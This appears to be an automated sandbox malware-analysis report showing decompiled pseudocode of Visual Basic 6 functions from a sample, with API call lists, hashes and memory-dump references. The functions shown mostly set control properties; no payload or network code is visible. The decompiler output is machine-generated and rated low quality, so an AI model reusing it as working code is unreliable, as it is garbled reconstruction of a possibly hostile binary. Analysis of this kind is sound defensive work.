                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: F8310271B043105BC324EF21E844EAB73FAEBC8746F41082EB68893240D67CED84C76A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004170C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E004170C0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr* _t22;
				void* _t24;
				void* _t27;
				void* _t28;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				_t48 = _t47 - 0x24;
				_v16 = _t48;
				_v12 = 0x401418;
				_v8 = 0;
				_t43 = _a4;
				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
				_v28 = 0;
				_t22 =  *((intOrPtr*)( *_t43 + 0x3ac))(_t43);
				__imp____vbaObjSet( &_v28, _t22);
				_t40 = _t22;
				_t24 =  *((intOrPtr*)( *_t40 + 0x54))(_t40, _a8);
				asm("fclex");
				if(_t24 < 0) {
					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x54);
				}
				__imp____vbaFreeObj();
				_t41 = _t48 - 0x10;
				 *_t41 = 8;
				 *((intOrPtr*)(_t41 + 4)) = _v40;
				 *(_t41 + 8) = L"ButtonBackColor";
				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
				asm("fclex");
				if(_t27 < 0) {
					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
				}
				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
				_push(0x417194);
				return _t28;
			}




















                                                                                0x004170c3
                                                                                0x004170d2
                                                                                0x004170d9
                                                                                0x004170df
                                                                                0x004170e2
                                                                                0x004170eb
                                                                                0x004170ee
                                                                                0x004170f4
                                                                                0x004170fa
                                                                                0x004170fd
                                                                                0x00417108
                                                                                0x00417111
                                                                                0x00417117
                                                                                0x0041711c
                                                                                0x0041711e
                                                                                0x00417129
                                                                                0x00417129
                                                                                0x00417132
                                                                                0x00417140
                                                                                0x0041714a
                                                                                0x0041714f
                                                                                0x00417152
                                                                                0x00417158
                                                                                0x0041715b
                                                                                0x00417163
                                                                                0x00417165
                                                                                0x00417173
                                                                                0x00417173
                                                                                0x0041717c
                                                                                0x00417182
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417108
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000054,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417129
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417132
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401418,0040F430,00000390), ref: 00417173
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free
                                                                                • String ID: ButtonBackColor
                                                                                • API String ID: 3976024557-3751566386
                                                                                • Opcode ID: 3b987c34004e9753320590fa2bc5a0748421a7b2fddbcf62a5bab024931de8a0
                                                                                • Instruction ID: 71db052ecdae409ba0909371a949f5de8a33efcce4d4d7b31651c4b982fe7c9d
                                                                                • Opcode Fuzzy Hash: 3b987c34004e9753320590fa2bc5a0748421a7b2fddbcf62a5bab024931de8a0
                                                                                • Instruction Fuzzy Hash: 96216D74900205BFC7009F68C989A9ABBF9FF49700F20853AF945E7291C778A9858B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00414CC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E00414CC0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr* _t22;
				void* _t24;
				void* _t27;
				void* _t28;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				_t48 = _t47 - 0x24;
				_v16 = _t48;
				_v12 = 0x401260;
				_v8 = 0;
				_t43 = _a4;
				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
				_v28 = 0;
				_t22 =  *((intOrPtr*)( *_t43 + 0x3b0))(_t43);
				__imp____vbaObjSet( &_v28, _t22);
				_t40 = _t22;
				_t24 =  *((intOrPtr*)( *_t40 + 0x54))(_t40, _a8);
				asm("fclex");
				if(_t24 < 0) {
					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x54);
				}
				__imp____vbaFreeObj();
				_t41 = _t48 - 0x10;
				 *_t41 = 8;
				 *((intOrPtr*)(_t41 + 4)) = _v40;
				 *(_t41 + 8) = L"BackColor";
				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
				asm("fclex");
				if(_t27 < 0) {
					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
				}
				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
				_push(0x414d94);
				return _t28;
			}




















                                                                                0x00414cc3
                                                                                0x00414cd2
                                                                                0x00414cd9
                                                                                0x00414cdf
                                                                                0x00414ce2
                                                                                0x00414ceb
                                                                                0x00414cee
                                                                                0x00414cf4
                                                                                0x00414cfa
                                                                                0x00414cfd
                                                                                0x00414d08
                                                                                0x00414d11
                                                                                0x00414d17
                                                                                0x00414d1c
                                                                                0x00414d1e
                                                                                0x00414d29
                                                                                0x00414d29
                                                                                0x00414d32
                                                                                0x00414d40
                                                                                0x00414d4a
                                                                                0x00414d4f
                                                                                0x00414d52
                                                                                0x00414d58
                                                                                0x00414d5b
                                                                                0x00414d63
                                                                                0x00414d65
                                                                                0x00414d73
                                                                                0x00414d73
                                                                                0x00414d7c
                                                                                0x00414d82
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D08
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000054,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D29
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D32
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040F430,00000390), ref: 00414D73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free
                                                                                • String ID: BackColor
                                                                                • API String ID: 3976024557-3019154971
                                                                                • Opcode ID: 2ab2aa2643bbad4e55afb473e8ea9daa847f1db1624756398e75763e3f0a8fc3
                                                                                • Instruction ID: 9c24af2665aa12c466e817f53982f4e97f53592b14043ebffd5b4acdc69109bf
                                                                                • Opcode Fuzzy Hash: 2ab2aa2643bbad4e55afb473e8ea9daa847f1db1624756398e75763e3f0a8fc3
                                                                                • Instruction Fuzzy Hash: B4217F74900205AFD7049FA8C989EDABBF8FF48704F20847EF545E7690CB78A885CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00414E80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E00414E80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr* _t22;
				void* _t24;
				void* _t27;
				void* _t28;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				_t48 = _t47 - 0x24;
				_v16 = _t48;
				_v12 = 0x401280;
				_v8 = 0;
				_t43 = _a4;
				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
				_v28 = 0;
				_t22 =  *((intOrPtr*)( *_t43 + 0x3b0))(_t43);
				__imp____vbaObjSet( &_v28, _t22);
				_t40 = _t22;
				_t24 =  *((intOrPtr*)( *_t40 + 0x6c))(_t40, _a8);
				asm("fclex");
				if(_t24 < 0) {
					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x6c);
				}
				__imp____vbaFreeObj();
				_t41 = _t48 - 0x10;
				 *_t41 = 8;
				 *((intOrPtr*)(_t41 + 4)) = _v40;
				 *(_t41 + 8) = L"ForeColor";
				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
				asm("fclex");
				if(_t27 < 0) {
					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
				}
				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
				_push(0x414f54);
				return _t28;
			}




















                                                                                0x00414e83
                                                                                0x00414e92
                                                                                0x00414e99
                                                                                0x00414e9f
                                                                                0x00414ea2
                                                                                0x00414eab
                                                                                0x00414eae
                                                                                0x00414eb4
                                                                                0x00414eba
                                                                                0x00414ebd
                                                                                0x00414ec8
                                                                                0x00414ed1
                                                                                0x00414ed7
                                                                                0x00414edc
                                                                                0x00414ede
                                                                                0x00414ee9
                                                                                0x00414ee9
                                                                                0x00414ef2
                                                                                0x00414f00
                                                                                0x00414f0a
                                                                                0x00414f0f
                                                                                0x00414f12
                                                                                0x00414f18
                                                                                0x00414f1b
                                                                                0x00414f23
                                                                                0x00414f25
                                                                                0x00414f33
                                                                                0x00414f33
                                                                                0x00414f3c
                                                                                0x00414f42
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EC8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000006C,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EE9
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EF2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401280,0040F430,00000390), ref: 00414F33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free
                                                                                • String ID: ForeColor
                                                                                • API String ID: 3976024557-3216175
                                                                                • Opcode ID: eefcccb9295053de52599cb7315220aa0d7fc486a939f50cc934217536083238
                                                                                • Instruction ID: 200adc891a931f130d032e10b44e63acef645ae65958817123503f6469996b9c
                                                                                • Opcode Fuzzy Hash: eefcccb9295053de52599cb7315220aa0d7fc486a939f50cc934217536083238
                                                                                • Instruction Fuzzy Hash: F6214F74900205AFC7009F69C989EAABBF8FF49704F20853EF545E7691C778A985CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418030, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00418030(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, short _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _t22;
				void* _t25;
				intOrPtr* _t28;
				intOrPtr* _t38;
				void* _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				_t43 = _t42 - 0x2c;
				_v16 = _t43;
				_v12 = 0x4014e0;
				_v8 = 0;
				_t38 = _a4;
				 *((intOrPtr*)( *_t38 + 4))(_t38, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t39);
				_t6 = _t38 + 0x70; // 0x0
				_t22 =  *_t6;
				_v40 = 0;
				 *((short*)(_t38 + 0x4c)) = _a8;
				if(_t22 != 0) {
					__imp____vbaI4Var( &_v40, 0);
					_t11 = _t38 + 0x70; // 0x0
					E0040F5DC();
					__imp____vbaSetSystemError( *_t11, 0xc5, _t22);
				}
				_t28 = _t43 - 0x10;
				 *_t28 = 8;
				 *((intOrPtr*)(_t28 + 4)) = _v52;
				 *(_t28 + 8) = L"MaxLen";
				 *((intOrPtr*)(_t28 + 0xc)) = _v44;
				_t25 =  *((intOrPtr*)( *_t38 + 0x390))(_t38);
				asm("fclex");
				if(_t25 < 0) {
					__imp____vbaHresultCheckObj(_t25, _t38, 0x40f430, 0x390);
				}
				__imp____vbaFreeVar(0x4180e9);
				return _t25;
			}

















                                                                                0x00418033
                                                                                0x00418042
                                                                                0x00418049
                                                                                0x0041804f
                                                                                0x00418052
                                                                                0x0041805b
                                                                                0x0041805e
                                                                                0x00418064
                                                                                0x00418067
                                                                                0x00418067
                                                                                0x00418070
                                                                                0x00418073
                                                                                0x00418077
                                                                                0x0041807e
                                                                                0x00418085
                                                                                0x0041808e
                                                                                0x00418093
                                                                                0x00418093
                                                                                0x004180a1
                                                                                0x004180ab
                                                                                0x004180b0
                                                                                0x004180b3
                                                                                0x004180b9
                                                                                0x004180bc
                                                                                0x004180c4
                                                                                0x004180c6
                                                                                0x004180d4
                                                                                0x004180d4
                                                                                0x004180e2
                                                                                0x004180e8

                                                                                APIs
                                                                                • __vbaI4Var.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041807E
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,000000C5,00000000), ref: 00418093
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004014E0,0040F430,00000390), ref: 004180D4
                                                                                • __vbaFreeVar.MSVBVM60(004180E9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004180E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckErrorFreeHresultSystem
                                                                                • String ID: MaxLen
                                                                                • API String ID: 2324377981-3286092166
                                                                                • Opcode ID: 3efd6e372770f0cc05d0e2e4e43b620ab7edef7ce5c7e643b02334a5fa94dfe8
                                                                                • Instruction ID: 43fb9eac10100783ebb17336cda9c751793323e4abdf3db86d3de273639be0b1
                                                                                • Opcode Fuzzy Hash: 3efd6e372770f0cc05d0e2e4e43b620ab7edef7ce5c7e643b02334a5fa94dfe8
                                                                                • Instruction Fuzzy Hash: 55116D74900204EFCB10EFA9CA89A9ABBF8FF58700F14856AF545E7660C774A944CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 006208F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: be8458aa7c433850413d84975fb1ba6ef4d7423ea53e0a294dbf9063bdaea9d8
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 214149716147256BE314DA29EC45BABB2DBABD4740F48483EF640D6243D670D5088FAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041DA00, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,00000000,004016F0,00401724), ref: 0041DA46
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DA67
                                                                                • __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DA78
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DA83
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041DAA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresultMoveNew2Text
                                                                                • String ID:
                                                                                • API String ID: 3236348378-0
                                                                                • Opcode ID: 8c6afbb01b9905e70d77daef7e8ee2e29f94c3ba3ddb5ceb0b079cc7ff36a70d
                                                                                • Instruction ID: fdc46e1b3e124afdd385c64085a586ee7b82449415dd7df5bddc25780375a6e7
                                                                                • Opcode Fuzzy Hash: 8c6afbb01b9905e70d77daef7e8ee2e29f94c3ba3ddb5ceb0b079cc7ff36a70d
                                                                                • Instruction Fuzzy Hash: A1116AB4C01248ABCB10DFA5CA48ADEBBF8EF58750F20451AE046B72A4D3785A49CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421610, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421656
                                                                                • __vbaStrCmp.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421663
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421672
                                                                                • __vbaRaiseEvent.MSVBVM60(00401A10,00000001,00000000,?,?,?,?,?,00401D26), ref: 00421679
                                                                                • __vbaFreeStr.MSVBVM60(00421691,?,?,?,?,?,00401D26), ref: 0042168A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Copy$EventFreeRaise
                                                                                • String ID:
                                                                                • API String ID: 154623747-0
                                                                                • Opcode ID: fa92cc8b5623ba4c8629e18c7f4c6513b7b9acaae828e53bd6cd7ba46c6761ba
                                                                                • Instruction ID: b2d60d446fcf4414bed0bbee23a1a3e3726a2811a8e07469eda3bd4126f49575
                                                                                • Opcode Fuzzy Hash: fa92cc8b5623ba4c8629e18c7f4c6513b7b9acaae828e53bd6cd7ba46c6761ba
                                                                                • Instruction Fuzzy Hash: 89015274A00209AFDB10DF55DA86AAFBBB8FF44700F10801AF945B3660D774A945CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004217D0, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421816
                                                                                • __vbaStrCmp.MSVBVM60(?,00421968,?,?,?,?,?,00401D26), ref: 00421823
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421832
                                                                                • __vbaRaiseEvent.MSVBVM60(00401A40,00000001,00000000,?,?,?,?,?,00401D26), ref: 00421839
                                                                                • __vbaFreeStr.MSVBVM60(00421851,?,?,?,?,?,00401D26), ref: 0042184A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Copy$EventFreeRaise
                                                                                • String ID:
                                                                                • API String ID: 154623747-0
                                                                                • Opcode ID: caca446f4272e883799ed2886b058530965cada52f6969c94c22aa01c1ef8de3
                                                                                • Instruction ID: 66dacd79cef0309c3f62b2f2e94dc7dbe992664eea759b47d75e66a3ecdcf870
                                                                                • Opcode Fuzzy Hash: caca446f4272e883799ed2886b058530965cada52f6969c94c22aa01c1ef8de3
                                                                                • Instruction Fuzzy Hash: BF015274A00209AFDB10EF55DA86AAFBFB9FF44700F108019F605A3660D774A945CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00417B70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 22%
                                                                                			E00417B70(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _t30;
				short _t31;
				void* _t34;
				intOrPtr* _t35;
				void* _t38;
				char _t39;
				void* _t51;
				intOrPtr* _t53;
				void* _t55;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr _t59;

				 *[fs:0x0] = _t58;
				_t59 = _t58 - 0x28;
				_v16 = _t59;
				_v12 = 0x4014a0;
				_t39 = 0;
				_v8 = 0;
				_t56 = _a4;
				 *((intOrPtr*)( *_t56 + 4))(_t56, _t51, _t55, _t38,  *[fs:0x0], 0x401d26);
				_v44 = 0;
				_t30 = _a8;
				if(_t30 == 0) {
					_t11 = _t56 + 0x70; // 0x0
					_t31 =  &_v44;
					_push(_t31);
					_push(0);
					_push(0xcf);
					_v44 = 0;
					_push( *_t11);
					goto L4;
				} else {
					_t31 = _t30 - 1;
					if(_t31 == 0) {
						_t8 = _t56 + 0x70; // 0x0
						_push( &_v44);
						_push(0xffffffff);
						_push(0xcf);
						_v44 = 0;
						_push( *_t8);
						L4:
						E0040F5DC();
						__imp____vbaSetSystemError();
						 *((intOrPtr*)(_t56 + 0x80)) = _t31;
						_t39 = 0;
					}
				}
				__imp____vbaI2I4();
				_t53 = _t59 - 0x10;
				 *((short*)(_t56 + 0x46)) = _t31;
				 *_t53 = 8;
				 *((intOrPtr*)(_t53 + 4)) = _v36;
				 *(_t53 + 8) = L"ControlType";
				 *((intOrPtr*)(_t53 + 0xc)) = _v28;
				_t34 =  *((intOrPtr*)( *_t56 + 0x390))(_t56);
				asm("fclex");
				if(_t34 < _t39) {
					__imp____vbaHresultCheckObj(_t34, _t56, 0x40f430, 0x390);
				}
				_t35 = _a4;
				 *((intOrPtr*)( *_t35 + 8))(_t35);
				 *[fs:0x0] = _v24;
				return _v8;
			}






















                                                                                0x00417b82
                                                                                0x00417b89
                                                                                0x00417b8f
                                                                                0x00417b92
                                                                                0x00417b99
                                                                                0x00417b9b
                                                                                0x00417b9e
                                                                                0x00417ba4
                                                                                0x00417baa
                                                                                0x00417baf
                                                                                0x00417bb1
                                                                                0x00417bca
                                                                                0x00417bcd
                                                                                0x00417bd0
                                                                                0x00417bd1
                                                                                0x00417bd2
                                                                                0x00417bd7
                                                                                0x00417bda
                                                                                0x00000000
                                                                                0x00417bb3
                                                                                0x00417bb3
                                                                                0x00417bb4
                                                                                0x00417bb6
                                                                                0x00417bbc
                                                                                0x00417bbd
                                                                                0x00417bbf
                                                                                0x00417bc4
                                                                                0x00417bc7
                                                                                0x00417bdb
                                                                                0x00417bdb
                                                                                0x00417be2
                                                                                0x00417be8
                                                                                0x00417bee
                                                                                0x00417bee
                                                                                0x00417bb4
                                                                                0x00417bf2
                                                                                0x00417c00
                                                                                0x00417c04
                                                                                0x00417c0d
                                                                                0x00417c13
                                                                                0x00417c16
                                                                                0x00417c1c
                                                                                0x00417c1f
                                                                                0x00417c27
                                                                                0x00417c29
                                                                                0x00417c37
                                                                                0x00417c37
                                                                                0x00417c3d
                                                                                0x00417c43
                                                                                0x00417c4e
                                                                                0x00417c59

                                                                                APIs
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,000000CF,00000000,?), ref: 00417BE2
                                                                                • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417BF2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004014A0,0040F430,00000390), ref: 00417C37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
